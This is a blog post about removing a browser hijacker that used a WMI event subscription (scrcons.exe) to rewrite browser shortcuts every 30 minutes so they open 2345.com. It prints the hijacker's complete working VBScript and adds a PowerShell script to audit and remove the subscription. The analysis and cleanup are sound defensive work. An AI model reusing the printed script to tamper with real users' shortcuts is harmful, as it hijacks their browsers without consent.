The real fix for Chrome being hijacked by hao123.com and similar malicious links
阿新 • Published: 2019-01-23
One day, wanting to download something from verycd.com, I searched for a "verycd link viewer" (why is not worth explaining, you know the type), and sure enough I ended up swallowing a fly!......
It could not find any download links, so I simply deleted it. But then I noticed that opening a browser immediately redirected to
http://www.2345.com/, and every browser I opened, Chrome, Firefox, Opera, Safari,
iexplorer, maxthon, showed the same symptom, while each browser's home page setting was perfectly normal!
In the end I found that the shortcut commands in the Quick Launch bar had been modified; after modification they looked like this:
"C:\Program Files (x86)\Mozilla Firefox\firefox.exe" http://www.2345.com/?kunown
So I assumed it was just an ordinary shortcut modification and removed the "http://www.2345.com/?kunown" part by hand. That did not last long: half an hour later it had been changed again, and that is when I concluded the system had been wormed!
Norton was installed on this machine and had detected nothing.
I also installed Super Rabbit (超級兔子), 360, and ExterminateIt to scan, and none of them found anything either...... so I promptly uninstalled them all...... (after uninstalling Super Rabbit I found it had left its bundled browser junk behind!!! Real garbage! I removed that by hand, no need to go into it!)
I opened Process Monitor to watch, and found that every 30 minutes a scrcons.exe process started on its own, modified the Quick Launch shortcut commands, and then exited (thankfully it was every 30 minutes; if it had been once every 24 hours I would have been in real trouble......). On Win7 the Opera quick launch icon it modified had a path similar to the following:
C:\Users\Gemini\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Opera12.01 1532.lnk
Name="unown"; choose "view instance properties", as shown in the figure below:
The script in full is as follows:
```vbscript
' Script body of the WMI script consumer found on this machine (executed by scrcons.exe).
' Reformatted from the original single colon-separated line onto separate lines; logic unchanged.
' It rewrites the Arguments of every browser shortcut it finds so the browser opens 2345.com.
On Error Resume Next
Const link = "http://www.2345.com/?kunown"
browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", _
                 "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", _
                 "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe")
' Lower-cased lookup table of the targeted browser executables
Set oDic = CreateObject("scripting.dictionary")
For Each browser In browsers
    oDic.Add LCase(browser), browser
Next
Set fso = CreateObject("Scripting.Filesystemobject")
Set WshShell = CreateObject("Wscript.Shell")
' Shortcut folders it scans: both desktops, Quick Launch, and the pinned Start Menu / Taskbar folders
strDesktop = "C:\Users\Gemini\Desktop"
strAllUsersDesktop = WshShell.SpecialFolders("AllUsersDesktop")
QuickLaunch = "C:\Users\Gemini\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
UserPinnedStartMenu = QuickLaunch & "\User Pinned\StartMenu"
UserPinnedTaskBar = QuickLaunch & "\User Pinned\TaskBar"

' The same loop is repeated for each folder: for every .lnk whose target is a listed browser,
' set its arguments to the hijack URL, clearing the read-only attribute (bit 1) first so Save succeeds.
For Each file In fso.GetFolder(strDesktop).Files
    If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
        Set oShellLink = WshShell.CreateShortcut(file.Path)
        path = oShellLink.TargetPath
        name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
        If oDic.Exists(LCase(name)) Then
            oShellLink.Arguments = link
            If file.Attributes And 1 Then
                file.Attributes = file.Attributes - 1
            End If
            oShellLink.Save
        End If
    End If
Next
For Each file In fso.GetFolder(strAllUsersDesktop).Files
    If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
        Set oShellLink = WshShell.CreateShortcut(file.Path)
        path = oShellLink.TargetPath
        name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
        If oDic.Exists(LCase(name)) Then
            oShellLink.Arguments = link
            If file.Attributes And 1 Then
                file.Attributes = file.Attributes - 1
            End If
            oShellLink.Save
        End If
    End If
Next
If fso.FolderExists(QuickLaunch) Then
    For Each file In fso.GetFolder(QuickLaunch).Files
        If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
            Set oShellLink = WshShell.CreateShortcut(file.Path)
            path = oShellLink.TargetPath
            name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
            If oDic.Exists(LCase(name)) Then
                oShellLink.Arguments = link
                If file.Attributes And 1 Then
                    file.Attributes = file.Attributes - 1
                End If
                oShellLink.Save
            End If
        End If
    Next
End If
If fso.FolderExists(UserPinnedStartMenu) Then
    For Each file In fso.GetFolder(UserPinnedStartMenu).Files
        If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
            Set oShellLink = WshShell.CreateShortcut(file.Path)
            path = oShellLink.TargetPath
            name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
            If oDic.Exists(LCase(name)) Then
                oShellLink.Arguments = link
                If file.Attributes And 1 Then
                    file.Attributes = file.Attributes - 1
                End If
                oShellLink.Save
            End If
        End If
    Next
End If
If fso.FolderExists(UserPinnedTaskBar) Then
    For Each file In fso.GetFolder(UserPinnedTaskBar).Files
        If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
            Set oShellLink = WshShell.CreateShortcut(file.Path)
            path = oShellLink.TargetPath
            name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
            If oDic.Exists(LCase(name)) Then
                oShellLink.Arguments = link
                If file.Attributes And 1 Then
                    file.Attributes = file.Attributes - 1
                End If
                oShellLink.Save
            End If
        End If
    Next
End If
```
Finally, the cleanup: in the WMI Event Viewer, right-click the `__EventFilter:Name="unown_filter"` item and delete it!
Can't delete it?
Go to the WMITool installation path (for example C:\Program Files (x86)\WMI Tools), right-click wbemeventviewer.exe, choose "Run as administrator", and delete it from there!
That is not all: you still have to manually remove http://www.2345.com/?kunown from each browser's shortcut command in the Quick Launch bar!
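For anyone who hits the same thing, here is an added PowerShell script (not from the original post) that does from an elevated prompt what the post does by hand: it lists every permanent WMI event subscription in root\subscription, including the script body of any ActiveScriptEventConsumer that scrcons.exe would run, then scans the Desktop and Quick Launch shortcut folders for browser .lnk files whose arguments carry a URL and restores them. The final block removes the subscription by the names seen in this post (filter "unown_filter", consumer assumed to be the "unown" instance shown above); substitute whatever names the listing prints on your machine.

```powershell
# Added example, not from the original post: audit the WMI persistence and the
# hijacked browser shortcuts described above. Run from an elevated PowerShell prompt.
$ns = 'root\subscription'

"== Permanent WMI event subscriptions =="
# A binding ties an __EventFilter (the trigger, e.g. a timer) to a consumer.
Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding |
    Select-Object Filter, Consumer | Format-List
Get-CimInstance -Namespace $ns -ClassName __EventFilter |
    Select-Object Name, Query | Format-List
# ActiveScriptEventConsumer is what scrcons.exe executes; ScriptText is the script body.
Get-CimInstance -Namespace $ns -ClassName ActiveScriptEventConsumer |
    Select-Object Name, ScriptingEngine, ScriptText | Format-List

"== Browser shortcuts carrying a URL in their arguments =="
$browsers = 'iexplore.exe','chrome.exe','firefox.exe','opera.exe','safari.exe','maxthon.exe'
$ql = "$env:APPDATA\Microsoft\Internet Explorer\Quick Launch"
$folders = @([Environment]::GetFolderPath('Desktop'),
             [Environment]::GetFolderPath('CommonDesktopDirectory'),
             $ql, "$ql\User Pinned\TaskBar", "$ql\User Pinned\StartMenu") |
           Where-Object { Test-Path $_ }
$shell = New-Object -ComObject WScript.Shell
foreach ($lnk in Get-ChildItem -Path $folders -Filter *.lnk -File) {
    $sc  = $shell.CreateShortcut($lnk.FullName)
    $exe = [IO.Path]::GetFileName($sc.TargetPath).ToLower()
    if ($browsers -contains $exe -and $sc.Arguments -match 'https?://') {
        "$($lnk.FullName) -> $exe $($sc.Arguments)"
        # Restore the shortcut: clear the read-only bit the hijacker toggles, then drop the arguments.
        $lnk.IsReadOnly = $false
        $sc.Arguments = ''
        $sc.Save()
    }
}

# Removal order: the binding first, then the filter and the consumer it referenced.
# 'unown_filter' / 'unown' are the names from this post; substitute the ones printed above.
Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding |
    Where-Object { $_.Filter.Name -eq 'unown_filter' } | Remove-CimInstance
Get-CimInstance -Namespace $ns -ClassName __EventFilter -Filter "Name='unown_filter'" |
    Remove-CimInstance
Get-CimInstance -Namespace $ns -ClassName ActiveScriptEventConsumer -Filter "Name='unown'" |
    Remove-CimInstance
```

Re-run the first section afterwards; an empty binding and filter listing, and no scrcons.exe reappearing in Process Monitor after the 30-minute interval, confirms the subscription is gone.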
That is all for now; if it turns out to have other effects, we will see with further use!
Well, at least the fly got spat back out in the end!